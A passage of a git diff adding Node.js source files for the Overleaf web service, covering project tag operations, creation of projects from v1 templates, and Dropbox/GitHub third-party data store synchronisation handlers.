new Error('Exceeded max tag length') + } + return Tag.updateOne( + { + _id: tagId, + user_id: userId, + }, + { + $set: { + name, + color, + }, + } + ) +} + +async function deleteTag(userId, tagId) { + await Tag.deleteOne({ + _id: tagId, + user_id: userId, + }) +} + +async function removeProjectFromTag(userId, tagId, projectId) { + const searchOps = { + _id: tagId, + user_id: userId, + } + const deleteOperation = { $pull: { project_ids: projectId } } + await Tag.updateOne(searchOps, deleteOperation) +} + +async function removeProjectsFromTag(userId, tagId, projectIds) { + const searchOps = { + _id: tagId, + user_id: userId, + } + const deleteOperation = { $pullAll: { project_ids: projectIds } } + await Tag.updateOne(searchOps, deleteOperation) +} + +async function addProjectToTag(userId, tagId, projectId) { + const searchOps = { + _id: tagId, + user_id: userId, + } + const insertOperation = { $addToSet: { project_ids: projectId } } + return Tag.findOneAndUpdate(searchOps, insertOperation) +} + +async function addProjectsToTag(userId, tagId, projectIds) { + const searchOps = { + _id: tagId, + user_id: userId, + } + const insertOperation = { $addToSet: { project_ids: { $each: projectIds } } } + await Tag.findOneAndUpdate(searchOps, insertOperation) +} + +async function addProjectToTagName(userId, name, projectId) { + const searchOps = { + name, + user_id: userId, + } + const insertOperation = { $addToSet: { project_ids: projectId } } + await Tag.updateOne(searchOps, insertOperation, { upsert: true }) +} + +async function removeProjectFromAllTags(userId, projectId) { + const searchOps = { user_id: userId } + const deleteOperation = { $pull: { project_ids: projectId } } + await Tag.updateMany(searchOps, deleteOperation) +} + +async function addProjectToTags(userId, tagIds, projectId) { + const searchOps = { user_id: userId, _id: { $in: tagIds } } + const insertOperation = { $addToSet: { project_ids: projectId } } + await Tag.updateMany(searchOps, insertOperation) +} + +module.exports = { + getAllTags: callbackify(getAllTags), + countTagsForProject: callbackify(countTagsForProject), + getTagsForProject: callbackify(getTagsForProject), + createTag: callbackify(createTag), + renameTag: callbackify(renameTag), + editTag: callbackify(editTag), + deleteTag: callbackify(deleteTag), + addProjectToTag: callbackify(addProjectToTag), + addProjectsToTag: callbackify(addProjectsToTag), + addProjectToTags: callbackify(addProjectToTags), + removeProjectFromTag: callbackify(removeProjectFromTag), + removeProjectsFromTag: callbackify(removeProjectsFromTag), + addProjectToTagName: callbackify(addProjectToTagName), + removeProjectFromAllTags: callbackify(removeProjectFromAllTags), + promises: { + getAllTags, + countTagsForProject, + getTagsForProject, + createTag, + renameTag, + editTag, + deleteTag, + addProjectToTag, + addProjectsToTag, + addProjectToTags, + removeProjectFromTag, + removeProjectsFromTag, + addProjectToTagName, + removeProjectFromAllTags, + }, +} diff --git a/services/web/app/src/Features/Tags/types.d.ts b/services/web/app/src/Features/Tags/types.d.ts new file mode 100644 index 0000000..17a43fd --- /dev/null +++ b/services/web/app/src/Features/Tags/types.d.ts @@ -0,0 +1,7 @@ +export type Tag = { + _id: string + user_id: string + name: string + color?: string + project_ids?: string[] +} diff --git a/services/web/app/src/Features/Templates/TemplatesController.js b/services/web/app/src/Features/Templates/TemplatesController.js new file mode 100644 index 0000000..ac82d0c --- /dev/null +++ 
b/services/web/app/src/Features/Templates/TemplatesController.js @@ -0,0 +1,62 @@ +const path = require('path') +const SessionManager = require('../Authentication/SessionManager') +const TemplatesManager = require('./TemplatesManager') +const ProjectHelper = require('../Project/ProjectHelper') +const logger = require('@overleaf/logger') +const { expressify } = require('@overleaf/promise-utils') + +const TemplatesController = { + getV1Template(req, res) { + const templateVersionId = req.params.Template_version_id + const templateId = req.query.id + if (!/^[0-9]+$/.test(templateVersionId) || !/^[0-9]+$/.test(templateId)) { + logger.err( + { templateVersionId, templateId }, + 'invalid template id or version' + ) + return res.sendStatus(400) + } + const data = { + templateVersionId, + templateId, + name: req.query.templateName, + compiler: ProjectHelper.compilerFromV1Engine(req.query.latexEngine), + imageName: req.query.texImage, + mainFile: req.query.mainFile, + brandVariationId: req.query.brandVariationId, + } + return res.render( + path.resolve( + __dirname, + '../../../views/project/editor/new_from_template' + ), + data + ) + }, + + async createProjectFromV1Template(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const project = await TemplatesManager.promises.createProjectFromV1Template( + req.body.brandVariationId, + req.body.compiler, + req.body.mainFile, + req.body.templateId, + req.body.templateName, + req.body.templateVersionId, + userId, + req.body.imageName + ) + delete req.session.templateData + if (!project) { + throw new Error('failed to create project from template') + } + return res.redirect(`/project/${project._id}`) + }, +} + +module.exports = { + getV1Template: TemplatesController.getV1Template, + createProjectFromV1Template: expressify( + TemplatesController.createProjectFromV1Template + ), +} diff --git a/services/web/app/src/Features/Templates/TemplatesManager.js b/services/web/app/src/Features/Templates/TemplatesManager.js new file mode 100644 index 0000000..6a2b620 --- /dev/null +++ b/services/web/app/src/Features/Templates/TemplatesManager.js @@ -0,0 +1,153 @@ +const { Project } = require('../../models/Project') +const ProjectDetailsHandler = require('../Project/ProjectDetailsHandler') +const ProjectOptionsHandler = + require('../Project/ProjectOptionsHandler').promises +const ProjectRootDocManager = + require('../Project/ProjectRootDocManager').promises +const ProjectUploadManager = require('../Uploads/ProjectUploadManager') +const fs = require('fs') +const util = require('util') +const logger = require('@overleaf/logger') +const { + fetchJson, + fetchStreamWithResponse, + RequestFailedError, +} = require('@overleaf/fetch-utils') +const settings = require('@overleaf/settings') +const crypto = require('crypto') +const Errors = require('../Errors/Errors') +const { pipeline } = require('stream/promises') +const ClsiCacheManager = require('../Compile/ClsiCacheManager') + +const TemplatesManager = { + async createProjectFromV1Template( + brandVariationId, + compiler, + mainFile, + templateId, + templateName, + templateVersionId, + userId, + imageName + ) { + const zipUrl = `${settings.apis.v1.url}/api/v1/overleaf/templates/${templateVersionId}` + const zipReq = await fetchStreamWithResponse(zipUrl, { + basicAuth: { + user: settings.apis.v1.user, + password: settings.apis.v1.pass, + }, + signal: AbortSignal.timeout(settings.apis.v1.timeout), + }) + + const projectName = ProjectDetailsHandler.fixProjectName(templateName) + const dumpPath = 
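      // A unique scratch path under the configured dump folder; the
      // finally block below removes the file whether or not the project
      // import succeeds.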
`${settings.path.dumpFolder}/${crypto.randomUUID()}` + const writeStream = fs.createWriteStream(dumpPath) + try { + const attributes = { + fromV1TemplateId: templateId, + fromV1TemplateVersionId: templateVersionId, + } + await pipeline(zipReq.stream, writeStream) + + if (zipReq.response.status !== 200) { + logger.warn( + { uri: zipUrl, statusCode: zipReq.response.status }, + 'non-success code getting zip from template API' + ) + throw new Error(`get zip failed: ${zipReq.response.status}`) + } + const project = + await ProjectUploadManager.promises.createProjectFromZipArchiveWithName( + userId, + projectName, + dumpPath, + attributes + ) + + const prepareClsiCacheInBackground = ClsiCacheManager.prepareClsiCache( + project._id, + userId, + { templateId, templateVersionId } + ).catch(err => { + logger.warn( + { err, templateId, templateVersionId, projectId: project._id }, + 'failed to prepare clsi-cache from template' + ) + }) + + await TemplatesManager._setCompiler(project._id, compiler) + await TemplatesManager._setImage(project._id, imageName) + await TemplatesManager._setMainFile(project._id, mainFile) + await TemplatesManager._setBrandVariationId(project._id, brandVariationId) + + const update = { + fromV1TemplateId: templateId, + fromV1TemplateVersionId: templateVersionId, + } + await Project.updateOne({ _id: project._id }, update, {}) + + await prepareClsiCacheInBackground + + return project + } finally { + await fs.promises.unlink(dumpPath) + } + }, + + async _setCompiler(projectId, compiler) { + if (compiler == null) { + return + } + await ProjectOptionsHandler.setCompiler(projectId, compiler) + }, + + async _setImage(projectId, imageName) { + if (!imageName) { + imageName = 'wl_texlive:2018.1' + } + + await ProjectOptionsHandler.setImageName(projectId, imageName) + }, + + async _setMainFile(projectId, mainFile) { + if (mainFile == null) { + return + } + await ProjectRootDocManager.setRootDocFromName(projectId, mainFile) + }, + + async _setBrandVariationId(projectId, brandVariationId) { + if (brandVariationId == null) { + return + } + await ProjectOptionsHandler.setBrandVariationId(projectId, brandVariationId) + }, + + async fetchFromV1(templateId) { + const url = new URL(`/api/v2/templates/${templateId}`, settings.apis.v1.url) + + try { + return await fetchJson(url, { + basicAuth: { + user: settings.apis.v1.user, + password: settings.apis.v1.pass, + }, + signal: AbortSignal.timeout(settings.apis.v1.timeout), + }) + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + throw new Errors.NotFoundError() + } else { + throw err + } + } + }, +} + +module.exports = { + promises: TemplatesManager, + createProjectFromV1Template: util.callbackify( + TemplatesManager.createProjectFromV1Template + ), + fetchFromV1: util.callbackify(TemplatesManager.fetchFromV1), +} diff --git a/services/web/app/src/Features/Templates/TemplatesMiddleware.js b/services/web/app/src/Features/Templates/TemplatesMiddleware.js new file mode 100644 index 0000000..ff3bebf --- /dev/null +++ b/services/web/app/src/Features/Templates/TemplatesMiddleware.js @@ -0,0 +1,21 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
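// saveTemplateDataInSession (below) stashes the template query parameters
// in the session before the login check runs (see the route ordering in
// TemplatesRouter), and createProjectFromV1Template deletes
// req.session.templateData again once the project has been created.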
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') + +module.exports = { + saveTemplateDataInSession(req, res, next) { + if (req.query.templateName) { + req.session.templateData = req.query + } + return next() + }, +} diff --git a/services/web/app/src/Features/Templates/TemplatesRouter.js b/services/web/app/src/Features/Templates/TemplatesRouter.js new file mode 100644 index 0000000..8f66c53 --- /dev/null +++ b/services/web/app/src/Features/Templates/TemplatesRouter.js @@ -0,0 +1,36 @@ +const AuthenticationController = require('../Authentication/AuthenticationController') +const TemplatesController = require('./TemplatesController') +const TemplatesMiddleware = require('./TemplatesMiddleware') +const { RateLimiter } = require('../../infrastructure/RateLimiter') +const RateLimiterMiddleware = require('../Security/RateLimiterMiddleware') +const AnalyticsRegistrationSourceMiddleware = require('../Analytics/AnalyticsRegistrationSourceMiddleware') + +const rateLimiter = new RateLimiter('create-project-from-template', { + points: 20, + duration: 60, +}) + +module.exports = { + rateLimiter, + apply(app) { + app.get( + '/project/new/template/:Template_version_id', + (req, res, next) => + AnalyticsRegistrationSourceMiddleware.setSource( + 'template', + req.params.Template_version_id + )(req, res, next), + TemplatesMiddleware.saveTemplateDataInSession, + AuthenticationController.requireLogin(), + TemplatesController.getV1Template, + AnalyticsRegistrationSourceMiddleware.clearSource() + ) + + app.post( + '/project/new/template', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiter), + TemplatesController.createProjectFromV1Template + ) + }, +} diff --git a/services/web/app/src/Features/ThirdPartyDataStore/TpdsController.mjs b/services/web/app/src/Features/ThirdPartyDataStore/TpdsController.mjs new file mode 100644 index 0000000..2b8667b --- /dev/null +++ b/services/web/app/src/Features/ThirdPartyDataStore/TpdsController.mjs @@ -0,0 +1,230 @@ +import { expressify } from '@overleaf/promise-utils' +import TpdsUpdateHandler from './TpdsUpdateHandler.mjs' +import UpdateMerger from './UpdateMerger.js' +import Errors from '../Errors/Errors.js' +import logger from '@overleaf/logger' +import Path from 'node:path' +import metrics from '@overleaf/metrics' +import NotificationsBuilder from '../Notifications/NotificationsBuilder.js' +import SessionManager from '../Authentication/SessionManager.js' +import ProjectCreationHandler from '../Project/ProjectCreationHandler.js' +import ProjectDetailsHandler from '../Project/ProjectDetailsHandler.js' +import HttpErrorHandler from '../Errors/HttpErrorHandler.js' +import TpdsQueueManager from './TpdsQueueManager.mjs' + +async function createProject(req, res) { + const { user_id: userId } = req.params + let { projectName } = req.body + projectName = await ProjectDetailsHandler.promises.generateUniqueName( + userId, + projectName + ) + const project = await ProjectCreationHandler.promises.createBlankProject( + userId, + projectName, + {}, + { skipCreatingInTPDS: true } + ) + res.json({ + projectId: project._id.toString(), + }) +} + +// mergeUpdate and deleteUpdate are used by Dropbox, where the project is only +// passed as the name, as the first part of the file path. 
They have to check +// the project exists, find it, and create it if not. They also ignore 'noisy' +// files like .DS_Store, .gitignore, etc. + +async function mergeUpdate(req, res) { + metrics.inc('tpds.merge-update') + const { filePath, userId, projectId, projectName } = parseParams(req) + const source = req.headers['x-update-source'] || 'unknown' + + let metadata + try { + metadata = await TpdsUpdateHandler.promises.newUpdate( + userId, + projectId, + projectName, + filePath, + req, + source + ) + } catch (err) { + if (err.name === 'TooManyRequestsError') { + logger.warn( + { err, userId, filePath }, + 'tpds update failed to be processed, too many requests' + ) + return res.sendStatus(429) + } else if (err.message === 'project_has_too_many_files') { + logger.warn( + { err, userId, filePath }, + 'tpds trying to append to project over file limit' + ) + NotificationsBuilder.tpdsFileLimit(userId).create(projectName, projectId) + return res.sendStatus(400) + } else { + throw err + } + } + + if (metadata == null) { + return res.json({ status: 'rejected' }) + } + + const payload = { + status: 'applied', + projectId: metadata.projectId.toString(), + entityId: metadata.entityId.toString(), + entityType: metadata.entityType, + folderId: metadata.folderId.toString(), + } + + // When the update is a doc edit, the update is merged in docupdater and + // doesn't generate a new rev. + if (metadata.rev != null) { + payload.rev = metadata.rev.toString() + } + res.json(payload) +} + +async function deleteUpdate(req, res) { + metrics.inc('tpds.delete-update') + const { filePath, userId, projectId, projectName } = parseParams(req) + const source = req.headers['x-update-source'] || 'unknown' + + await TpdsUpdateHandler.promises.deleteUpdate( + userId, + projectId, + projectName, + filePath, + source + ) + res.sendStatus(200) +} + +/** + * Update endpoint that accepts update details as JSON + */ +async function updateFolder(req, res) { + const userId = req.body.userId + const projectId = req.body.projectId + const { projectName, filePath } = splitPath(projectId, req.body.path) + const metadata = await TpdsUpdateHandler.promises.createFolder( + userId, + projectId, + projectName, + filePath + ) + if (metadata == null) { + return HttpErrorHandler.conflict(req, res, 'Could not create folder', { + userId, + projectName, + filePath, + }) + } + res.json({ + entityId: metadata.folderId.toString(), + projectId: metadata.projectId.toString(), + path: metadata.path, + folderId: metadata.parentFolderId?.toString() || null, + }) +} + +// updateProjectContents and deleteProjectContents are used by GitHub. The +// project_id is known so we can skip right ahead to creating/updating/deleting +// the file. These methods will not ignore noisy files like .DS_Store, +// .gitignore, etc because people are generally more explicit with the files +// they want in git. 
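+// For the Dropbox endpoints above, splitPath() (bottom of this file) turns
+// the name-addressed paths into project name + file path. Made-up examples:
+//
+//   splitPath(null, '/MyProject/main.tex')
+//     -> { projectName: 'MyProject', filePath: '/main.tex' }
+//   splitPath(null, '/MyProject')
+//     -> { projectName: 'MyProject', filePath: '/' }
+//   splitPath('5f0c...', '/main.tex') // a project id short-circuits the split
+//     -> { projectName: '', filePath: '/main.tex' }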
+ +async function updateProjectContents(req, res) { + const projectId = req.params.project_id + const path = `/${req.params[0]}` // UpdateMerger expects leading slash + const source = req.headers['x-update-source'] || 'unknown' + + try { + const metadata = await UpdateMerger.promises.mergeUpdate( + null, + projectId, + path, + req, + source + ) + res.json({ + entityId: metadata.entityId.toString(), + rev: metadata.rev, + }) + } catch (error) { + if ( + error instanceof Errors.InvalidNameError || + error instanceof Errors.DuplicateNameError + ) { + res.sendStatus(422) + } else { + throw error + } + } +} + +async function deleteProjectContents(req, res) { + const projectId = req.params.project_id + const path = `/${req.params[0]}` // UpdateMerger expects leading slash + const source = req.headers['x-update-source'] || 'unknown' + + const entityId = await UpdateMerger.promises.deleteUpdate( + null, + projectId, + path, + source + ) + res.json({ entityId }) +} + +async function getQueues(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + res.json(await TpdsQueueManager.promises.getQueues(userId)) +} + +function parseParams(req) { + const userId = req.params.user_id + const projectId = req.params.project_id + const { projectName, filePath } = splitPath(projectId, req.params[0]) + return { filePath, userId, projectName, projectId } +} + +function splitPath(projectId, path) { + let filePath, projectName + path = Path.join('/', path) + if (projectId) { + filePath = path + projectName = '' + } else if (path.substring(1).indexOf('/') === -1) { + filePath = '/' + projectName = path.substring(1) + } else { + filePath = path.substring(path.indexOf('/', 1)) + projectName = path.substring(0, path.indexOf('/', 1)) + projectName = projectName.replace('/', '') + } + + return { filePath, projectName } +} + +export default { + createProject: expressify(createProject), + mergeUpdate: expressify(mergeUpdate), + deleteUpdate: expressify(deleteUpdate), + updateFolder: expressify(updateFolder), + updateProjectContents: expressify(updateProjectContents), + deleteProjectContents: expressify(deleteProjectContents), + getQueues: expressify(getQueues), + + promises: { + deleteProjectContents, + updateProjectContents, + }, + + // for tests only + parseParams, +} diff --git a/services/web/app/src/Features/ThirdPartyDataStore/TpdsProjectFlusher.js b/services/web/app/src/Features/ThirdPartyDataStore/TpdsProjectFlusher.js new file mode 100644 index 0000000..5565571 --- /dev/null +++ b/services/web/app/src/Features/ThirdPartyDataStore/TpdsProjectFlusher.js @@ -0,0 +1,117 @@ +const { callbackify } = require('util') +const logger = require('@overleaf/logger') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const ProjectGetter = require('../Project/ProjectGetter') +const ProjectEntityHandler = require('../Project/ProjectEntityHandler') +const { Project } = require('../../models/Project') +const TpdsUpdateSender = require('./TpdsUpdateSender') +const OError = require('@overleaf/o-error') + +module.exports = { + flushProjectToTpds: callbackify(flushProjectToTpds), + deferProjectFlushToTpds: callbackify(deferProjectFlushToTpds), + flushProjectToTpdsIfNeeded: callbackify(flushProjectToTpdsIfNeeded), + promises: { + flushProjectToTpds, + deferProjectFlushToTpds, + flushProjectToTpdsIfNeeded, + }, +} + +/** + * Flush a complete project to the TPDS. 
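+ *
+ * The flush works in three steps (see _flushProjectToTpds below): flush any
+ * pending edits from docupdater to mongo, enumerate every doc and file in
+ * the project, then queue one TPDS add job per entity for each collaborator
+ * who has Dropbox linked.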
+ */
+async function flushProjectToTpds(projectId) {
+  const project = await ProjectGetter.promises.getProject(projectId, {
+    name: true,
+    deferredTpdsFlushCounter: true,
+    'overleaf.history.id': 1,
+  })
+  await _flushProjectToTpds(project)
+}
+
+/**
+ * Flush a project to TPDS if a flush is pending. This is called when
+ * projects are loaded in the editor and triggers a sync to dropbox for
+ * projects that were imported from Overleaf v1.
+ */
+async function flushProjectToTpdsIfNeeded(projectId) {
+  const project = await ProjectGetter.promises.getProject(projectId, {
+    name: true,
+    deferredTpdsFlushCounter: true,
+    'overleaf.history.id': 1,
+  })
+  if (project.deferredTpdsFlushCounter > 0) {
+    await _flushProjectToTpds(project)
+  }
+}
+
+async function _flushProjectToTpds(project) {
+  const historyId = project?.overleaf?.history?.id
+  if (!historyId) {
+    const projectId = project._id
+    throw new OError('project does not have a history id', { projectId })
+  }
+  logger.debug({ projectId: project._id }, 'flushing project to TPDS')
+  await DocumentUpdaterHandler.promises.flushProjectToMongo(project._id)
+  const [docs, files] = await Promise.all([
+    ProjectEntityHandler.promises.getAllDocs(project._id),
+    ProjectEntityHandler.promises.getAllFiles(project._id),
+  ])
+  for (const [docPath, doc] of Object.entries(docs)) {
+    await TpdsUpdateSender.promises.addDoc({
+      projectId: project._id,
+      docId: doc._id,
+      path: docPath,
+      projectName: project.name,
+      rev: doc.rev || 0,
+      folderId: doc.folder._id,
+    })
+  }
+  for (const [filePath, file] of Object.entries(files)) {
+    await TpdsUpdateSender.promises.addFile({
+      projectId: project._id,
+      historyId,
+      fileId: file._id,
+      hash: file.hash,
+      path: filePath,
+      projectName: project.name,
+      rev: file.rev,
+      folderId: file.folder._id,
+    })
+  }
+  await _resetDeferredTpdsFlushCounter(project)
+  logger.debug({ projectId: project._id }, 'finished flushing project to TPDS')
+}
+
+/**
+ * Reset the TPDS pending flush counter.
+ *
+ * To avoid concurrency problems, the flush counter is not reset if it has been
+ * incremented since we fetched it from the database.
+ */
+async function _resetDeferredTpdsFlushCounter(project) {
+  if (project.deferredTpdsFlushCounter > 0) {
+    await Project.updateOne(
+      {
+        _id: project._id,
+        deferredTpdsFlushCounter: { $lte: project.deferredTpdsFlushCounter },
+      },
+      { $set: { deferredTpdsFlushCounter: 0 } }
+    ).exec()
+  }
+}
+
+/**
+ * Mark a project as pending a flush to TPDS.
+ * This was called as part of the import process for Overleaf v1 projects.
+ * We no longer use this method, but imported v1 projects have the
+ * deferredTpdsFlushCounter set and will trigger a flush when loaded in
+ * the editor.
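+ *
+ * The counter also acts as a concurrency guard: this method $inc's it,
+ * flushProjectToTpdsIfNeeded() only flushes when it is above zero, and
+ * _resetDeferredTpdsFlushCounter() clears it with a $lte filter so that a
+ * counter bumped after we read it is not accidentally zeroed.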
+ */ +async function deferProjectFlushToTpds(projectId) { + await Project.updateOne( + { _id: projectId }, + { $inc: { deferredTpdsFlushCounter: 1 } } + ).exec() +} diff --git a/services/web/app/src/Features/ThirdPartyDataStore/TpdsQueueManager.mjs b/services/web/app/src/Features/ThirdPartyDataStore/TpdsQueueManager.mjs new file mode 100644 index 0000000..253d0f0 --- /dev/null +++ b/services/web/app/src/Features/ThirdPartyDataStore/TpdsQueueManager.mjs @@ -0,0 +1,17 @@ +import Settings from '@overleaf/settings' +import OError from '@overleaf/o-error' +import { fetchJson } from '@overleaf/fetch-utils' + +async function getQueues(userId) { + try { + return await fetchJson(`${Settings.apis.tpdsworker.url}/queues/${userId}`) + } catch (err) { + throw OError.tag(err, 'failed to query TPDS queues for user', { userId }) + } +} + +export default { + promises: { + getQueues, + }, +} diff --git a/services/web/app/src/Features/ThirdPartyDataStore/TpdsUpdateHandler.mjs b/services/web/app/src/Features/ThirdPartyDataStore/TpdsUpdateHandler.mjs new file mode 100644 index 0000000..219db88 --- /dev/null +++ b/services/web/app/src/Features/ThirdPartyDataStore/TpdsUpdateHandler.mjs @@ -0,0 +1,205 @@ +import { callbackify } from 'node:util' +import UpdateMerger from './UpdateMerger.js' +import logger from '@overleaf/logger' +import NotificationsBuilder from '../Notifications/NotificationsBuilder.js' +import ProjectCreationHandler from '../Project/ProjectCreationHandler.js' +import ProjectDeleter from '../Project/ProjectDeleter.js' +import ProjectGetter from '../Project/ProjectGetter.js' +import ProjectHelper from '../Project/ProjectHelper.js' +import ProjectRootDocManager from '../Project/ProjectRootDocManager.js' +import FileTypeManager from '../Uploads/FileTypeManager.js' +import CooldownManager from '../Cooldown/CooldownManager.js' +import Errors from '../Errors/Errors.js' +import Modules from '../../infrastructure/Modules.js' + +async function newUpdate( + userId, + projectId, + projectName, + path, + updateRequest, + source +) { + const project = await getOrCreateProject(userId, projectId, projectName) + if (project == null) { + return null + } + + const projectIsOnCooldown = + await CooldownManager.promises.isProjectOnCooldown(project._id) + if (projectIsOnCooldown) { + throw new Errors.TooManyRequestsError('project on cooldown') + } + + const shouldIgnore = await FileTypeManager.promises.shouldIgnore(path) + if (shouldIgnore) { + return null + } + + const metadata = await UpdateMerger.promises.mergeUpdate( + userId, + project._id, + path, + updateRequest, + source + ) + return metadata +} + +async function deleteUpdate(userId, projectId, projectName, path, source) { + logger.debug({ userId, filePath: path }, 'handling delete update from tpds') + let projects = [] + if (projectId) { + const project = await findProjectByIdWithRWAccess(userId, projectId) + if (project) { + projects = [project] + } + } else { + projects = await ProjectGetter.promises.findUsersProjectsByName( + userId, + projectName + ) + } + const activeProjects = projects.filter( + project => !ProjectHelper.isArchivedOrTrashed(project, userId) + ) + + if (activeProjects.length === 0) { + logger.debug( + { userId, filePath: path, projectName }, + 'project not found from tpds update, ignoring folder or project' + ) + return + } + + if (projects.length > 1) { + // There is more than one project with that name, and one of them is + // active (previous condition) + await handleDuplicateProjects(userId, projectName) + return + } + + const 
project = activeProjects[0]
+  if (path === '/') {
+    logger.debug(
+      { userId, filePath: path, projectName, projectId: project._id },
+      'project found for delete update, path is root so marking project as deleted'
+    )
+    await ProjectDeleter.promises.markAsDeletedByExternalSource(project._id)
+  } else {
+    await UpdateMerger.promises.deleteUpdate(userId, project._id, path, source)
+  }
+}
+
+async function getOrCreateProject(userId, projectId, projectName) {
+  if (projectId) {
+    return findProjectByIdWithRWAccess(userId, projectId)
+  } else {
+    return getOrCreateProjectByName(userId, projectName)
+  }
+}
+
+async function findProjectByIdWithRWAccess(userId, projectId) {
+  const allProjects = await ProjectGetter.promises.findAllUsersProjects(
+    userId,
+    'name archived trashed'
+  )
+  for (const projects of [allProjects.owned, allProjects.readAndWrite]) {
+    for (const project of projects) {
+      if (project._id.toString() === projectId) {
+        return project
+      }
+    }
+  }
+}
+
+async function getOrCreateProjectByName(userId, projectName) {
+  const projects = await ProjectGetter.promises.findUsersProjectsByName(
+    userId,
+    projectName
+  )
+
+  if (projects.length === 0) {
+    // No project with that name -- active, archived or trashed -- has been
+    // found. Create one.
+    const project = await ProjectCreationHandler.promises.createBlankProject(
+      userId,
+      projectName
+    )
+
+    // have a crack at setting the root doc after a while; on creation
+    // we won't have it yet, but we should have been sent it within 30
+    // seconds
+    ProjectRootDocManager.setRootDocAutomaticallyInBackground(project._id)
+    return project
+  }
+
+  const activeProjects = projects.filter(
+    project => !ProjectHelper.isArchivedOrTrashed(project, userId)
+  )
+  if (activeProjects.length === 0) {
+    // All projects with that name are archived or trashed. Ignore.
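+    // (The incoming change is dropped rather than applied to a project the
+    // user has archived or trashed.)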
+ return null + } + + if (projects.length > 1) { + // There is more than one project with that name, and one of them is + // active (previous condition) + await handleDuplicateProjects(userId, projectName) + return null + } + + return activeProjects[0] +} + +async function handleDuplicateProjects(userId, projectName) { + await Modules.promises.hooks.fire( + 'removeDropbox', + userId, + 'duplicate-projects' + ) + await NotificationsBuilder.promises + .dropboxDuplicateProjectNames(userId) + .create(projectName) +} + +async function createFolder(userId, projectId, projectName, path) { + const project = await getOrCreateProject(userId, projectId, projectName) + if (project == null) { + return null + } + + const projectIsOnCooldown = + await CooldownManager.promises.isProjectOnCooldown(project._id) + if (projectIsOnCooldown) { + throw new Errors.TooManyRequestsError('project on cooldown') + } + + const shouldIgnore = await FileTypeManager.promises.shouldIgnore(path) + if (shouldIgnore) { + return null + } + + const folder = await UpdateMerger.promises.createFolder( + project._id, + path, + userId + ) + return { + folderId: folder._id, + parentFolderId: folder.parentFolder_id, + projectId: project._id, + path, + } +} + +export default { + newUpdate: callbackify(newUpdate), + deleteUpdate: callbackify(deleteUpdate), + createFolder: callbackify(createFolder), + promises: { + newUpdate, + deleteUpdate, + createFolder, + }, +} diff --git a/services/web/app/src/Features/ThirdPartyDataStore/TpdsUpdateSender.js b/services/web/app/src/Features/ThirdPartyDataStore/TpdsUpdateSender.js new file mode 100644 index 0000000..2aacc90 --- /dev/null +++ b/services/web/app/src/Features/ThirdPartyDataStore/TpdsUpdateSender.js @@ -0,0 +1,294 @@ +const { ObjectId } = require('mongodb-legacy') +const _ = require('lodash') +const { callbackify } = require('util') +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const Path = require('path') +const { fetchNothing } = require('@overleaf/fetch-utils') +const settings = require('@overleaf/settings') +const HistoryURLHelper = require('../History/HistoryURLHelper') + +const CollaboratorsGetter = + require('../Collaborators/CollaboratorsGetter').promises +const UserGetter = require('../User/UserGetter').promises + +const tpdsUrl = _.get(settings, ['apis', 'thirdPartyDataStore', 'url']) + +async function addDoc(params) { + metrics.inc('tpds.add-doc') + const { projectId, path, docId, projectName, rev, folderId } = params + + const streamOrigin = + settings.apis.docstore.pubUrl + + Path.join(`/project/${projectId}`, `/doc/${docId}`, '/raw') + + await addEntity({ + projectId, + path, + projectName, + rev, + folderId, + streamOrigin, + entityId: docId, + entityType: 'doc', + }) +} + +async function addEntity(params) { + const { + projectId, + path, + projectName, + rev, + folderId, + streamOrigin, + streamFallback, + entityId, + entityType, + } = params + + const projectUserIds = await getProjectUsersIds(projectId) + + for (const userId of projectUserIds) { + const job = { + method: 'post', + headers: { + 'x-entity-id': entityId, + 'x-entity-rev': rev, + 'x-entity-type': entityType, + 'x-folder-id': folderId, + 'x-project-id': projectId, + }, + uri: buildTpdsUrl(userId, projectName, path), + title: 'addFile', + streamOrigin, + streamFallback, + } + + await enqueue(userId, 'pipeStreamFrom', job) + } +} + +async function addFile(params) { + metrics.inc('tpds.add-file') + const { + projectId, + historyId, + fileId, + hash, + path, + 
projectName, + rev, + folderId, + } = params + // Go through project-history to avoid the need for handling history-v1 authentication. + const { url, fallbackURL } = + HistoryURLHelper.projectHistoryURLWithFilestoreFallback( + settings, + projectId, + historyId, + { _id: fileId, hash }, + 'tpdsAddFile' + ) + + await addEntity({ + projectId, + path, + projectName, + rev, + folderId, + streamOrigin: url, + streamFallback: fallbackURL, + entityId: fileId, + entityType: 'file', + }) +} + +function buildMovePaths(params) { + if (params.newProjectName) { + return { + startPath: Path.join('/', params.projectName, '/'), + endPath: Path.join('/', params.newProjectName, '/'), + } + } else { + return { + startPath: Path.join('/', params.projectName, '/', params.startPath), + endPath: Path.join('/', params.projectName, '/', params.endPath), + } + } +} + +function buildTpdsUrl(userId, projectName, filePath) { + const projectPath = encodeURIComponent(Path.join(projectName, '/', filePath)) + return `${tpdsUrl}/user/${userId}/entity/${projectPath}` +} + +async function deleteEntity(params) { + metrics.inc('tpds.delete-entity') + const { + projectId, + path, + projectName, + entityId, + entityType, + subtreeEntityIds, + } = params + + const projectUserIds = await getProjectUsersIds(projectId) + + for (const userId of projectUserIds) { + const job = { + method: 'delete', + headers: { + 'x-entity-id': entityId, + 'x-entity-type': entityType, + 'x-project-id': projectId, + }, + uri: buildTpdsUrl(userId, projectName, path), + // We're sending a body with the DELETE request. This is unconventional, + // but Express does handle it on the other side. Ideally, this operation + // would be moved to a POST endpoint. + json: { subtreeEntityIds }, + title: 'deleteEntity', + } + + await enqueue(userId, 'standardHttpRequest', job) + } +} + +async function createProject(params) { + if (!tpdsUrl) return // Overleaf Community Edition/Server Pro + + const { projectId, projectName, userId } = params + + const job = { + method: 'post', + headers: { + 'x-project-id': projectId, + }, + uri: Path.join( + tpdsUrl, + 'user', + userId.toString(), + 'project', + 'new', + encodeURIComponent(projectName) + ), + title: 'createProject', + } + + await enqueue(userId, 'standardHttpRequest', job) +} + +async function enqueue(group, method, job) { + const 